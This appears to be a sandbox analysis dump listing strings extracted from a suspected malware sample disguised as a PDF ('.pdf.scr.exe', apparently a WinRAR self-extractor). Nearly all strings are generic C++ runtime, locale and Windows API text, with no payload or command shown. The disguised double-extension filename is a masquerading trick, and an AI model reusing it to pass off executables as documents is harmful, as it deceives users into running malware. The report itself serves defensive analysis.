Source: 026910003102350.pdf.scr.exe, 00000000.00000002.340381369.0000000000CF3000.00000002.00000001.01000000.00000003.sdmp	Binary or memory string: %sdeletetexttitlepathsilentoverwritesetuptempmodelicensepresetupshortcutsavepathupdatesetupcode%s.%d.tmpsoftware\microsoft\windows\currentversionprogramfilesdir\hidemaxmin%s%s%u.lnk.infinstallsoftware\winrar sfxuser32.dllgdi32.dllcomdlg32.dlladvapi32.dllshell32.dll
Source: 026910003102350.pdf.scr.exe, 00000000.00000002.340381369.0000000000CF3000.00000002.00000001.01000000.00000003.sdmp	Binary or memory string: ole32.dll
Source: 026910003102350.pdf.scr.exe, 00000000.00000002.340381369.0000000000CF3000.00000002.00000001.01000000.00000003.sdmp	Binary or memory string: fole32.dll
Source: 026910003102350.pdf.scr.exe, 00000000.00000002.340381369.0000000000CF3000.00000002.00000001.01000000.00000003.sdmp	Binary or memory string: acquiresrwlockexclusive
Source: 026910003102350.pdf.scr.exe, 00000000.00000002.340381369.0000000000CF3000.00000002.00000001.01000000.00000003.sdmp	Binary or memory string: releasesrwlockexclusive
Source: 026910003102350.pdf.scr.exe, 00000000.00000002.340381369.0000000000CF3000.00000002.00000001.01000000.00000003.sdmp	Binary or memory string: shlwapi.dll
Source: 026910003102350.pdf.scr.exe, 00000000.00000002.340381369.0000000000CF3000.00000002.00000001.01000000.00000003.sdmp	Binary or memory string: comctl32.dll
Source: 026910003102350.pdf.scr.exe, 00000000.00000002.340381369.0000000000CF3000.00000002.00000001.01000000.00000003.sdmp	Binary or memory string: kernel32.dllacquiresrwlockexclusivereleasesrwlockexclusiveshlwapi.dllcomctl32.dll
Source: 026910003102350.pdf.scr.exe, 00000000.00000002.340381369.0000000000CF3000.00000002.00000001.01000000.00000003.sdmp	Binary or memory string: bad array new length
Source: 026910003102350.pdf.scr.exe, 00000000.00000002.340381369.0000000000CF3000.00000002.00000001.01000000.00000003.sdmp	Binary or memory string: bad array new length@
Source: 026910003102350.pdf.scr.exe, 00000000.00000002.340381369.0000000000CF3000.00000002.00000001.01000000.00000003.sdmp	Binary or memory string: <5ikq
Source: 026910003102350.pdf.scr.exe, 00000000.00000002.340381369.0000000000CF3000.00000002.00000001.01000000.00000003.sdmp	Binary or memory string: bad exception
Source: 026910003102350.pdf.scr.exe, 00000000.00000002.340381369.0000000000CF3000.00000002.00000001.01000000.00000003.sdmp	Binary or memory string: __based(
Source: 026910003102350.pdf.scr.exe, 00000000.00000002.340381369.0000000000CF3000.00000002.00000001.01000000.00000003.sdmp	Binary or memory string: __cdecl
Source: 026910003102350.pdf.scr.exe, 00000000.00000002.340381369.0000000000CF3000.00000002.00000001.01000000.00000003.sdmp	Binary or memory string: __pascal
Source: 026910003102350.pdf.scr.exe, 00000000.00000002.340381369.0000000000CF3000.00000002.00000001.01000000.00000003.sdmp	Binary or memory string: __stdcall
Source: 026910003102350.pdf.scr.exe, 00000000.00000002.340381369.0000000000CF3000.00000002.00000001.01000000.00000003.sdmp	Binary or memory string: __thiscall
Source: 026910003102350.pdf.scr.exe, 00000000.00000002.340381369.0000000000CF3000.00000002.00000001.01000000.00000003.sdmp	Binary or memory string: __fastcall
Source: 026910003102350.pdf.scr.exe, 00000000.00000002.340381369.0000000000CF3000.00000002.00000001.01000000.00000003.sdmp	Binary or memory string: __vectorcall
Source: 026910003102350.pdf.scr.exe, 00000000.00000002.340381369.0000000000CF3000.00000002.00000001.01000000.00000003.sdmp	Binary or memory string: __clrcall
Source: 026910003102350.pdf.scr.exe, 00000000.00000002.340381369.0000000000CF3000.00000002.00000001.01000000.00000003.sdmp	Binary or memory string: __eabi
Source: 026910003102350.pdf.scr.exe, 00000000.00000002.340381369.0000000000CF3000.00000002.00000001.01000000.00000003.sdmp	Binary or memory string: __swift_1
Source: 026910003102350.pdf.scr.exe, 00000000.00000002.340381369.0000000000CF3000.00000002.00000001.01000000.00000003.sdmp	Binary or memory string: __swift_2
Source: 026910003102350.pdf.scr.exe, 00000000.00000002.340381369.0000000000CF3000.00000002.00000001.01000000.00000003.sdmp	Binary or memory string: __swift_3
Source: 026910003102350.pdf.scr.exe, 00000000.00000002.340381369.0000000000CF3000.00000002.00000001.01000000.00000003.sdmp	Binary or memory string: __ptr64
Source: 026910003102350.pdf.scr.exe, 00000000.00000002.340381369.0000000000CF3000.00000002.00000001.01000000.00000003.sdmp	Binary or memory string: __restrict
Source: 026910003102350.pdf.scr.exe, 00000000.00000002.340381369.0000000000CF3000.00000002.00000001.01000000.00000003.sdmp	Binary or memory string: __unaligned
Source: 026910003102350.pdf.scr.exe, 00000000.00000002.340381369.0000000000CF3000.00000002.00000001.01000000.00000003.sdmp	Binary or memory string: restrict(
Source: 026910003102350.pdf.scr.exe, 00000000.00000002.340381369.0000000000CF3000.00000002.00000001.01000000.00000003.sdmp	Binary or memory string: delete
Source: 026910003102350.pdf.scr.exe, 00000000.00000002.340381369.0000000000CF3000.00000002.00000001.01000000.00000003.sdmp	Binary or memory string: operator
Source: 026910003102350.pdf.scr.exe, 00000000.00000002.340381369.0000000000CF3000.00000002.00000001.01000000.00000003.sdmp	Binary or memory string: `vftable'
Source: 026910003102350.pdf.scr.exe, 00000000.00000002.340381369.0000000000CF3000.00000002.00000001.01000000.00000003.sdmp	Binary or memory string: `vbtable'
Source: 026910003102350.pdf.scr.exe, 00000000.00000002.340381369.0000000000CF3000.00000002.00000001.01000000.00000003.sdmp	Binary or memory string: `vcall'
Source: 026910003102350.pdf.scr.exe, 00000000.00000002.340381369.0000000000CF3000.00000002.00000001.01000000.00000003.sdmp	Binary or memory string: `typeof'
Source: 026910003102350.pdf.scr.exe, 00000000.00000002.340381369.0000000000CF3000.00000002.00000001.01000000.00000003.sdmp	Binary or memory string: `local static guard'
Source: 026910003102350.pdf.scr.exe, 00000000.00000002.340381369.0000000000CF3000.00000002.00000001.01000000.00000003.sdmp	Binary or memory string: `string'
Source: 026910003102350.pdf.scr.exe, 00000000.00000002.340381369.0000000000CF3000.00000002.00000001.01000000.00000003.sdmp	Binary or memory string: `vbase destructor'
Source: 026910003102350.pdf.scr.exe, 00000000.00000002.340381369.0000000000CF3000.00000002.00000001.01000000.00000003.sdmp	Binary or memory string: `vector deleting destructor'
Source: 026910003102350.pdf.scr.exe, 00000000.00000002.340381369.0000000000CF3000.00000002.00000001.01000000.00000003.sdmp	Binary or memory string: `default constructor closure'
Source: 026910003102350.pdf.scr.exe, 00000000.00000002.340381369.0000000000CF3000.00000002.00000001.01000000.00000003.sdmp	Binary or memory string: `scalar deleting destructor'
Source: 026910003102350.pdf.scr.exe, 00000000.00000002.340381369.0000000000CF3000.00000002.00000001.01000000.00000003.sdmp	Binary or memory string: `vector constructor iterator'
Source: 026910003102350.pdf.scr.exe, 00000000.00000002.340381369.0000000000CF3000.00000002.00000001.01000000.00000003.sdmp	Binary or memory string: `vector destructor iterator'
Source: 026910003102350.pdf.scr.exe, 00000000.00000002.340381369.0000000000CF3000.00000002.00000001.01000000.00000003.sdmp	Binary or memory string: `vector vbase constructor iterator'
Source: 026910003102350.pdf.scr.exe, 00000000.00000002.340381369.0000000000CF3000.00000002.00000001.01000000.00000003.sdmp	Binary or memory string: `virtual displacement map'
Source: 026910003102350.pdf.scr.exe, 00000000.00000002.340381369.0000000000CF3000.00000002.00000001.01000000.00000003.sdmp	Binary or memory string: `eh vector constructor iterator'
Source: 026910003102350.pdf.scr.exe, 00000000.00000002.340381369.0000000000CF3000.00000002.00000001.01000000.00000003.sdmp	Binary or memory string: `eh vector destructor iterator'
Source: 026910003102350.pdf.scr.exe, 00000000.00000002.340381369.0000000000CF3000.00000002.00000001.01000000.00000003.sdmp	Binary or memory string: `eh vector vbase constructor iterator'
Source: 026910003102350.pdf.scr.exe, 00000000.00000002.340381369.0000000000CF3000.00000002.00000001.01000000.00000003.sdmp	Binary or memory string: `copy constructor closure'
Source: 026910003102350.pdf.scr.exe, 00000000.00000002.340381369.0000000000CF3000.00000002.00000001.01000000.00000003.sdmp	Binary or memory string: `udt returning'
Source: 026910003102350.pdf.scr.exe, 00000000.00000002.340381369.0000000000CF3000.00000002.00000001.01000000.00000003.sdmp	Binary or memory string: `rtti
Source: 026910003102350.pdf.scr.exe, 00000000.00000002.340381369.0000000000CF3000.00000002.00000001.01000000.00000003.sdmp	Binary or memory string: `local vftable'
Source: 026910003102350.pdf.scr.exe, 00000000.00000002.340381369.0000000000CF3000.00000002.00000001.01000000.00000003.sdmp	Binary or memory string: `local vftable constructor closure'
Source: 026910003102350.pdf.scr.exe, 00000000.00000002.340381369.0000000000CF3000.00000002.00000001.01000000.00000003.sdmp	Binary or memory string: new[]
Source: 026910003102350.pdf.scr.exe, 00000000.00000002.340381369.0000000000CF3000.00000002.00000001.01000000.00000003.sdmp	Binary or memory string: delete[]
Source: 026910003102350.pdf.scr.exe, 00000000.00000002.340381369.0000000000CF3000.00000002.00000001.01000000.00000003.sdmp	Binary or memory string: `omni callsig'
Source: 026910003102350.pdf.scr.exe, 00000000.00000002.340381369.0000000000CF3000.00000002.00000001.01000000.00000003.sdmp	Binary or memory string: `placement delete closure'
Source: 026910003102350.pdf.scr.exe, 00000000.00000002.340381369.0000000000CF3000.00000002.00000001.01000000.00000003.sdmp	Binary or memory string: `placement delete[] closure'
Source: 026910003102350.pdf.scr.exe, 00000000.00000002.340381369.0000000000CF3000.00000002.00000001.01000000.00000003.sdmp	Binary or memory string: `managed vector constructor iterator'
Source: 026910003102350.pdf.scr.exe, 00000000.00000002.340381369.0000000000CF3000.00000002.00000001.01000000.00000003.sdmp	Binary or memory string: `managed vector destructor iterator'
Source: 026910003102350.pdf.scr.exe, 00000000.00000002.340381369.0000000000CF3000.00000002.00000001.01000000.00000003.sdmp	Binary or memory string: `eh vector copy constructor iterator'
Source: 026910003102350.pdf.scr.exe, 00000000.00000002.340381369.0000000000CF3000.00000002.00000001.01000000.00000003.sdmp	Binary or memory string: `eh vector vbase copy constructor iterator'
Source: 026910003102350.pdf.scr.exe, 00000000.00000002.340381369.0000000000CF3000.00000002.00000001.01000000.00000003.sdmp	Binary or memory string: `dynamic initializer for '
Source: 026910003102350.pdf.scr.exe, 00000000.00000002.340381369.0000000000CF3000.00000002.00000001.01000000.00000003.sdmp	Binary or memory string: `dynamic atexit destructor for '
Source: 026910003102350.pdf.scr.exe, 00000000.00000002.340381369.0000000000CF3000.00000002.00000001.01000000.00000003.sdmp	Binary or memory string: `vector copy constructor iterator'
Source: 026910003102350.pdf.scr.exe, 00000000.00000002.340381369.0000000000CF3000.00000002.00000001.01000000.00000003.sdmp	Binary or memory string: `vector vbase copy constructor iterator'
Source: 026910003102350.pdf.scr.exe, 00000000.00000002.340381369.0000000000CF3000.00000002.00000001.01000000.00000003.sdmp	Binary or memory string: `managed vector copy constructor iterator'
Source: 026910003102350.pdf.scr.exe, 00000000.00000002.340381369.0000000000CF3000.00000002.00000001.01000000.00000003.sdmp	Binary or memory string: `local static thread guard'
Source: 026910003102350.pdf.scr.exe, 00000000.00000002.340381369.0000000000CF3000.00000002.00000001.01000000.00000003.sdmp	Binary or memory string: operator ""
Source: 026910003102350.pdf.scr.exe, 00000000.00000002.340381369.0000000000CF3000.00000002.00000001.01000000.00000003.sdmp	Binary or memory string: operator co_await
Source: 026910003102350.pdf.scr.exe, 00000000.00000002.340381369.0000000000CF3000.00000002.00000001.01000000.00000003.sdmp	Binary or memory string: operator<=>
Source: 026910003102350.pdf.scr.exe, 00000000.00000002.340381369.0000000000CF3000.00000002.00000001.01000000.00000003.sdmp	Binary or memory string: type descriptor'
Source: 026910003102350.pdf.scr.exe, 00000000.00000002.340381369.0000000000CF3000.00000002.00000001.01000000.00000003.sdmp	Binary or memory string: base class descriptor at (
Source: 026910003102350.pdf.scr.exe, 00000000.00000002.340381369.0000000000CF3000.00000002.00000001.01000000.00000003.sdmp	Binary or memory string: base class array'
Source: 026910003102350.pdf.scr.exe, 00000000.00000002.340381369.0000000000CF3000.00000002.00000001.01000000.00000003.sdmp	Binary or memory string: class hierarchy descriptor'
Source: 026910003102350.pdf.scr.exe, 00000000.00000002.340381369.0000000000CF3000.00000002.00000001.01000000.00000003.sdmp	Binary or memory string: complete object locator'
Source: 026910003102350.pdf.scr.exe, 00000000.00000002.340381369.0000000000CF3000.00000002.00000001.01000000.00000003.sdmp	Binary or memory string: `anonymous namespace'
Source: 026910003102350.pdf.scr.exe, 00000000.00000002.340381369.0000000000CF3000.00000002.00000001.01000000.00000003.sdmp	Binary or memory string: __based(__cdecl__pascal__stdcall__thiscall__fastcall__vectorcall__clrcall__eabi__swift_1__swift_2__swift_3__ptr64__restrict__unalignedrestrict( new delete=>><<!==!=[]operator->++---+&->/%<<=>>=,()~^\|&&\|\|*=+=-=/=%=>>=<<=&=\|=^=`vftable'`vbtable'`vcall'`typeof'`local static guard'`string'`vbase destructor'`vector deleting destructor'`default constructor closure'`scalar deleting destructor'`vector constructor iterator'`vector destructor iterator'`vector vbase constructor iterator'`virtual displacement map'`eh vector constructor iterator'`eh vector destructor iterator'`eh vector vbase constructor iterator'`copy constructor closure'`udt returning'`eh`rtti`local vftable'`local vftable constructor closure' new[] delete[]`omni callsig'`placement delete closure'`placement delete[] closure'`managed vector constructor iterator'`managed vector destructor iterator'`eh vector copy constructor iterator'`eh vector vbase copy constructor iterator'`dynamic initializer for '`dynamic atexit destructor for '`vector copy constructor iterator'`vector vbase copy constructor iterator'`managed vector copy constructor iterator'`local static thread guard'operator "" operator co_awaitoperator<=> type descriptor' base class descriptor at ( base class array' class hierarchy descriptor' complete object locator'`anonymous namespace'
Source: 026910003102350.pdf.scr.exe, 00000000.00000002.340381369.0000000000CF3000.00000002.00000001.01000000.00000003.sdmp	Binary or memory string: <pi-ms-win-core-fibers-l1-1-1<pi-ms-win-core-synch-l1-2-0api-ms-
Source: 026910003102350.pdf.scr.exe, 00000000.00000002.340381369.0000000000CF3000.00000002.00000001.01000000.00000003.sdmp	Binary or memory string: flsalloc
Source: 026910003102350.pdf.scr.exe, 00000000.00000002.340381369.0000000000CF3000.00000002.00000001.01000000.00000003.sdmp	Binary or memory string: flsfree
Source: 026910003102350.pdf.scr.exe, 00000000.00000002.340381369.0000000000CF3000.00000002.00000001.01000000.00000003.sdmp	Binary or memory string: flsgetvalue
Source: 026910003102350.pdf.scr.exe, 00000000.00000002.340381369.0000000000CF3000.00000002.00000001.01000000.00000003.sdmp	Binary or memory string: flssetvalue
Source: 026910003102350.pdf.scr.exe, 00000000.00000002.340381369.0000000000CF3000.00000002.00000001.01000000.00000003.sdmp	Binary or memory string: initializecriticalsectionex
Source: 026910003102350.pdf.scr.exe, 00000000.00000002.340381369.0000000000CF3000.00000002.00000001.01000000.00000003.sdmp	Binary or memory string: ( 8px
Source: 026910003102350.pdf.scr.exe, 00000000.00000002.340381369.0000000000CF3000.00000002.00000001.01000000.00000003.sdmp	Binary or memory string: 50p( 8px
Source: 026910003102350.pdf.scr.exe, 00000000.00000002.340381369.0000000000CF3000.00000002.00000001.01000000.00000003.sdmp	Binary or memory string: 700wp
Source: 026910003102350.pdf.scr.exe, 00000000.00000002.340381369.0000000000CF3000.00000002.00000001.01000000.00000003.sdmp	Binary or memory string: `h````
Source: 026910003102350.pdf.scr.exe, 00000000.00000002.340381369.0000000000CF3000.00000002.00000001.01000000.00000003.sdmp	Binary or memory string: xpxxxx
Source: 026910003102350.pdf.scr.exe, 00000000.00000002.340381369.0000000000CF3000.00000002.00000001.01000000.00000003.sdmp	Binary or memory string: `h````xpxxxx
Source: 026910003102350.pdf.scr.exe, 00000000.00000002.340381369.0000000000CF3000.00000002.00000001.01000000.00000003.sdmp	Binary or memory string: (null)
Source: 026910003102350.pdf.scr.exe, 00000000.00000002.340381369.0000000000CF3000.00000002.00000001.01000000.00000003.sdmp	Binary or memory string: (null)(null)
Source: 026910003102350.pdf.scr.exe, 00000000.00000002.340381369.0000000000CF3000.00000002.00000001.01000000.00000003.sdmp	Binary or memory string: corexitprocess
Source: 026910003102350.pdf.scr.exe, 00000000.00000002.340381369.0000000000CF3000.00000002.00000001.01000000.00000003.sdmp	Binary or memory string: mscoree.dllcorexitprocess`
Source: 026910003102350.pdf.scr.exe, 00000000.00000002.340381369.0000000000CF3000.00000002.00000001.01000000.00000003.sdmp	Binary or memory string: nan(snan)
Source: 026910003102350.pdf.scr.exe, 00000000.00000002.340381369.0000000000CF3000.00000002.00000001.01000000.00000003.sdmp	Binary or memory string: nan(snan)
Source: 026910003102350.pdf.scr.exe, 00000000.00000002.340381369.0000000000CF3000.00000002.00000001.01000000.00000003.sdmp	Binary or memory string: nan(ind)
Source: 026910003102350.pdf.scr.exe, 00000000.00000002.340381369.0000000000CF3000.00000002.00000001.01000000.00000003.sdmp	Binary or memory string: nan(ind)
Source: 026910003102350.pdf.scr.exe, 00000000.00000002.340381369.0000000000CF3000.00000002.00000001.01000000.00000003.sdmp	Binary or memory string: e+000
Source: 026910003102350.pdf.scr.exe, 00000000.00000002.340381369.0000000000CF3000.00000002.00000001.01000000.00000003.sdmp	Binary or memory string: sunday
Source: 026910003102350.pdf.scr.exe, 00000000.00000002.340381369.0000000000CF3000.00000002.00000001.01000000.00000003.sdmp	Binary or memory string: monday
Source: 026910003102350.pdf.scr.exe, 00000000.00000002.340381369.0000000000CF3000.00000002.00000001.01000000.00000003.sdmp	Binary or memory string: tuesday
Source: 026910003102350.pdf.scr.exe, 00000000.00000002.340381369.0000000000CF3000.00000002.00000001.01000000.00000003.sdmp	Binary or memory string: wednesday
Source: 026910003102350.pdf.scr.exe, 00000000.00000002.340381369.0000000000CF3000.00000002.00000001.01000000.00000003.sdmp	Binary or memory string: thursday
Source: 026910003102350.pdf.scr.exe, 00000000.00000002.340381369.0000000000CF3000.00000002.00000001.01000000.00000003.sdmp	Binary or memory string: friday
Source: 026910003102350.pdf.scr.exe, 00000000.00000002.340381369.0000000000CF3000.00000002.00000001.01000000.00000003.sdmp	Binary or memory string: saturday
Source: 026910003102350.pdf.scr.exe, 00000000.00000002.340381369.0000000000CF3000.00000002.00000001.01000000.00000003.sdmp	Binary or memory string: january
Source: 026910003102350.pdf.scr.exe, 00000000.00000002.340381369.0000000000CF3000.00000002.00000001.01000000.00000003.sdmp	Binary or memory string: february
Source: 026910003102350.pdf.scr.exe, 00000000.00000002.340381369.0000000000CF3000.00000002.00000001.01000000.00000003.sdmp	Binary or memory string: march
Source: 026910003102350.pdf.scr.exe, 00000000.00000002.340381369.0000000000CF3000.00000002.00000001.01000000.00000003.sdmp	Binary or memory string: april
Source: 026910003102350.pdf.scr.exe, 00000000.00000002.340381369.0000000000CF3000.00000002.00000001.01000000.00000003.sdmp	Binary or memory string: august
Source: 026910003102350.pdf.scr.exe, 00000000.00000002.340381369.0000000000CF3000.00000002.00000001.01000000.00000003.sdmp	Binary or memory string: september
Source: 026910003102350.pdf.scr.exe, 00000000.00000002.340381369.0000000000CF3000.00000002.00000001.01000000.00000003.sdmp	Binary or memory string: october
Source: 026910003102350.pdf.scr.exe, 00000000.00000002.340381369.0000000000CF3000.00000002.00000001.01000000.00000003.sdmp	Binary or memory string: november
Source: 026910003102350.pdf.scr.exe, 00000000.00000002.340381369.0000000000CF3000.00000002.00000001.01000000.00000003.sdmp	Binary or memory string: december
Source: 026910003102350.pdf.scr.exe, 00000000.00000002.340381369.0000000000CF3000.00000002.00000001.01000000.00000003.sdmp	Binary or memory string: mm/dd/yy
Source: 026910003102350.pdf.scr.exe, 00000000.00000002.340381369.0000000000CF3000.00000002.00000001.01000000.00000003.sdmp	Binary or memory string: dddd, mmmm dd, yyyy
Source: 026910003102350.pdf.scr.exe, 00000000.00000002.340381369.0000000000CF3000.00000002.00000001.01000000.00000003.sdmp	Binary or memory string: hh:mm:ss
Source: 026910003102350.pdf.scr.exe, 00000000.00000002.340381369.0000000000CF3000.00000002.00000001.01000000.00000003.sdmp	Binary or memory string: infinfnannannan(snan)nan(snan)nan(ind)nan(ind)e+000sunmontuewedthufrisatsundaymondaytuesdaywednesdaythursdayfridaysaturdayjanfebmaraprmayjunjulaugsepoctnovdecjanuaryfebruarymarchapriljunejulyaugustseptemberoctobernovemberdecemberampmmm/dd/yydddd, mmmm dd, yyyyhh:mm:sssunmontuewedthufrisatsundaymondaytuesdaywednesdaythursdayfridaysaturdayjanfebmaraprmayjunjulaugsepoctnovdecjanuaryfebruarymarchapriljunejulyaugustseptemberoctobernovemberdecemberampmmm/dd/yydddd, mmmm dd, yyyyhh:mm:ssen-us g
Source: 026910003102350.pdf.scr.exe, 00000000.00000002.340381369.0000000000CF3000.00000002.00000001.01000000.00000003.sdmp	Binary or memory string: ((((( h
Source: 026910003102350.pdf.scr.exe, 00000000.00000002.340381369.0000000000CF3000.00000002.00000001.01000000.00000003.sdmp	Binary or memory string: (
Source: 026910003102350.pdf.scr.exe, 00000000.00000002.340381369.0000000000CF3000.00000002.00000001.01000000.00000003.sdmp	Binary or memory string: !"#$%&'()*+,-./0123456789:;<=>?@abcdefghijklmnopqrstuvwxyz[\]^_`abcdefghijklmnopqrstuvwxyz{\|}~
Source: 026910003102350.pdf.scr.exe, 00000000.00000002.340381369.0000000000CF3000.00000002.00000001.01000000.00000003.sdmp	Binary or memory string: !"#$%&'()*+,-./0123456789:;<=>?@abcdefghijklmnopqrstuvwxyz[\]^_`abcdefghijklmnopqrstuvwxyz{\|}~
Source: 026910003102350.pdf.scr.exe, 00000000.00000002.340381369.0000000000CF3000.00000002.00000001.01000000.00000003.sdmp	Binary or memory string: api-ms-win-appmodel-runtime-l1-1-1<pi-ms-win-core-datetime-l1-1-1<pi-ms-win-core-fibers-l1-1-1<pi-ms-win-core-file-l2-1-1<pi-ms-win-core-localization-l1-2-1<pi-ms-win-core-localization-obsolete-l1-2-0<pi-ms-win-core-processthreads-l1-1-2<pi-ms-win-core-string-l1-1-0<pi-ms-win-core-synch-l1-2-0<pi-ms-win-core-sysinfo-l1-2-1<pi-ms-win-core-winrt-l1-1-0<pi-ms-win-core-xstate-l2-1-0api-ms-win-rtcore-ntuser-window-l1-1-0api-ms-win-security-systemfunctions-l1-1-0ext-ms-win-kernel32-package-current-l1-1-0ext-ms-win-ntuser-dialogbox-l1-1-0ext-ms-win-ntuser-windowstation-l1-1-0advapi32kernel32user32
Source: 026910003102350.pdf.scr.exe, 00000000.00000002.340381369.0000000000CF3000.00000002.00000001.01000000.00000003.sdmp	Binary or memory string: getcurrentpackageid
Source: 026910003102350.pdf.scr.exe, 00000000.00000002.340381369.0000000000CF3000.00000002.00000001.01000000.00000003.sdmp	Binary or memory string: lcmapstringex
Source: 026910003102350.pdf.scr.exe, 00000000.00000002.340381369.0000000000CF3000.00000002.00000001.01000000.00000003.sdmp	Binary or memory string: localenametolcid
Source: 026910003102350.pdf.scr.exe, 00000000.00000002.340381369.0000000000CF3000.00000002.00000001.01000000.00000003.sdmp	Binary or memory string: ja-jpzh-cnko-krzh-twuk
Source: 026910003102350.pdf.scr.exe, 00000000.00000002.340381369.0000000000CF3000.00000002.00000001.01000000.00000003.sdmp	Binary or memory string: k#cd8l2
Source: 026910003102350.pdf.scr.exe, 00000000.00000002.340381369.0000000000CF3000.00000002.00000001.01000000.00000003.sdmp	Binary or memory string: [aoni*{
Source: 026910003102350.pdf.scr.exe, 00000000.00000002.340381369.0000000000CF3000.00000002.00000001.01000000.00000003.sdmp	Binary or memory string: elk(w
Source: 026910003102350.pdf.scr.exe, 00000000.00000002.340381369.0000000000CF3000.00000002.00000001.01000000.00000003.sdmp	Binary or memory string: ~ $s%r
Source: 026910003102350.pdf.scr.exe, 00000000.00000002.340381369.0000000000CF3000.00000002.00000001.01000000.00000003.sdmp	Binary or memory string: @b;zo]
Source: 026910003102350.pdf.scr.exe, 00000000.00000002.340381369.0000000000CF3000.00000002.00000001.01000000.00000003.sdmp	Binary or memory string: iu+-,
Source: 026910003102350.pdf.scr.exe, 00000000.00000002.340381369.0000000000CF3000.00000002.00000001.01000000.00000003.sdmp	Binary or memory string: obwq4
Source: 026910003102350.pdf.scr.exe, 00000000.00000002.340381369.0000000000CF3000.00000002.00000001.01000000.00000003.sdmp	Binary or memory string: v2!l.2
Source: 026910003102350.pdf.scr.exe, 00000000.00000002.340381369.0000000000CF3000.00000002.00000001.01000000.00000003.sdmp	Binary or memory string: ^<v7w
Source: 026910003102350.pdf.scr.exe, 00000000.00000002.340381369.0000000000CF3000.00000002.00000001.01000000.00000003.sdmp	Binary or memory string: 1#inf
Source: 026910003102350.pdf.scr.exe, 00000000.00000002.340381369.0000000000CF3000.00000002.00000001.01000000.00000003.sdmp	Binary or memory string: 1#qnan
Source: 026910003102350.pdf.scr.exe, 00000000.00000002.340381369.0000000000CF3000.00000002.00000001.01000000.00000003.sdmp	Binary or memory string: 1#snan
Source: 026910003102350.pdf.scr.exe, 00000000.00000002.340381369.0000000000CF3000.00000002.00000001.01000000.00000003.sdmp	Binary or memory string: 1#ind
Source: 026910003102350.pdf.scr.exe, 00000000.00000002.340381369.0000000000CF3000.00000002.00000001.01000000.00000003.sdmp	Binary or memory string: ;01#inf1#qnan1#snan1#ind
Source: 026910003102350.pdf.scr.exe, 00000000.00000002.340381369.0000000000CF3000.00000002.00000001.01000000.00000003.sdmp	Binary or memory string: arbgcazh-chscsdadeelenesfifrhehuisitjakonlnoplptroruhrsksqsvthtruridbesletlvltfavihyazeumkafkafohimskkkyswuzttpagutateknmrsamnglkoksyrdivar-sabg-bgca-escs-czda-dkde-deel-grfi-fifr-frhe-ilhu-huis-isit-itnl-nlnb-nopl-plpt-brro-roru-ruhr-hrsk-sksq-alsv-seth-thtr-trur-pkid-iduk-uabe-bysl-siet-eelv-lvlt-ltfa-irvi-vnhy-amaz-az-latneu-esmk-mktn-zaxh-zazu-zaaf-zaka-gefo-fohi-inmt-mtse-noms-mykk-kzky-kgsw-keuz-uz-latntt-rubn-inpa-ingu-inta-inte-inkn-inml-inmr-insa-inmn-mncy-gbgl-eskok-insyr-sydiv-mvquz-bons-zami-nzar-iqde-chen-gbes-mxfr-beit-chnl-benn-nopt-ptsr-sp-latnsv-fiaz-az-cyrlse-sems-bnuz-uz-cyrlquz-ecar-egzh-hkde-aten-aues-esfr-casr-sp-cyrlse-fiquz-pear-lyzh-sgde-luen-caes-gtfr-chhr-basmj-noar-dzzh-mode-lien-nzes-crfr-lubs-ba-latnsmj-sear-maen-iees-pafr-mcsr-ba-latnsma-noar-tnen-zaes-dosr-ba-cyrlsma-sear-omen-jmes-vesms-fiar-yeen-cbes-cosmn-fiar-syen-bzes-pear-joen-ttes-arar-lben-zwes-ecar-kwen-phes-clar-aees-uyar-bhes-pyar-qaes-boes-sves-hnes-nies-przh-chtsrx
Source: 026910003102350.pdf.scr.exe, 00000000.00000002.340381369.0000000000CF3000.00000002.00000001.01000000.00000003.sdmp	Binary or memory string: paf-zaar-aear-bhar-dzar-egar-iqar-joar-kwar-lbar-lyar-maar-omar-qaar-saar-syar-tnar-yeaz-az-cyrlaz-az-latnbe-bybg-bgbn-inbs-ba-latnca-escs-czcy-gbda-dkde-atde-chde-dede-lide-ludiv-mvel-gren-auen-bzen-caen-cben-gben-ieen-jmen-nzen-phen-tten-usen-zaen-zwes-ares-boes-cles-coes-cres-does-eces-eses-gtes-hnes-mxes-nies-paes-pees-pres-pyes-sves-uyes-veet-eeeu-esfa-irfi-fifo-fofr-befr-cafr-chfr-frfr-lufr-mcgl-esgu-inhe-ilhi-inhr-bahr-hrhu-huhy-amid-idis-isit-chit-itja-jpka-gekk-kzkn-inkok-inko-krky-kglt-ltlv-lvmi-nzmk-mkml-inmn-mnmr-inms-bnms-mymt-mtnb-nonl-benl-nlnn-nons-zapa-inpl-plpt-brpt-ptquz-boquz-ecquz-pero-roru-rusa-inse-fise-nose-sesk-sksl-sisma-nosma-sesmj-nosmj-sesmn-fisms-fisq-alsr-ba-cyrlsr-ba-latnsr-sp-cyrlsr-sp-latnsv-fisv-sesw-kesyr-syta-inte-inth-thtn-zatr-trtt-ruuk-uaur-pkuz-uz-cyrluz-uz-latnvi-vnxh-zazh-chszh-chtzh-cnzh-hkzh-mozh-sgzh-twzu-za
Source: 026910003102350.pdf.scr.exe, 00000000.00000002.340381369.0000000000CF3000.00000002.00000001.01000000.00000003.sdmp	Binary or memory string: log10
Source: 026910003102350.pdf.scr.exe, 00000000.00000002.340381369.0000000000CF3000.00000002.00000001.01000000.00000003.sdmp	Binary or memory string: 0log10
Source: 026910003102350.pdf.scr.exe, 00000000.00000002.340381369.0000000000CF3000.00000002.00000001.01000000.00000003.sdmp	Binary or memory string: ?0c0c
Source: 026910003102350.pdf.scr.exe, 00000000.00000002.340381369.0000000000CF3000.00000002.00000001.01000000.00000003.sdmp	Binary or memory string: loglog10exppowasinacossqrt
Source: 026910003102350.pdf.scr.exe, 00000000.00000002.340381369.0000000000CF3000.00000002.00000001.01000000.00000003.sdmp	Binary or memory string: 9=@$"
Source: 026910003102350.pdf.scr.exe, 00000000.00000002.340381369.0000000000CF3000.00000002.00000001.01000000.00000003.sdmp	Binary or memory string: ?5wg4p
Source: 026910003102350.pdf.scr.exe, 00000000.00000002.340381369.0000000000CF3000.00000002.00000001.01000000.00000003.sdmp	Binary or memory string: bc .=
Source: 026910003102350.pdf.scr.exe, 00000000.00000002.340381369.0000000000CF3000.00000002.00000001.01000000.00000003.sdmp	Binary or memory string: bc .=0
Source: 026910003102350.pdf.scr.exe, 00000000.00000002.340381369.0000000000CF3000.00000002.00000001.01000000.00000003.sdmp	Binary or memory string: <(lx
Source: 026910003102350.pdf.scr.exe, 00000000.00000002.340381369.0000000000CF3000.00000002.00000001.01000000.00000003.sdmp	Binary or memory string: #{ =`~r=
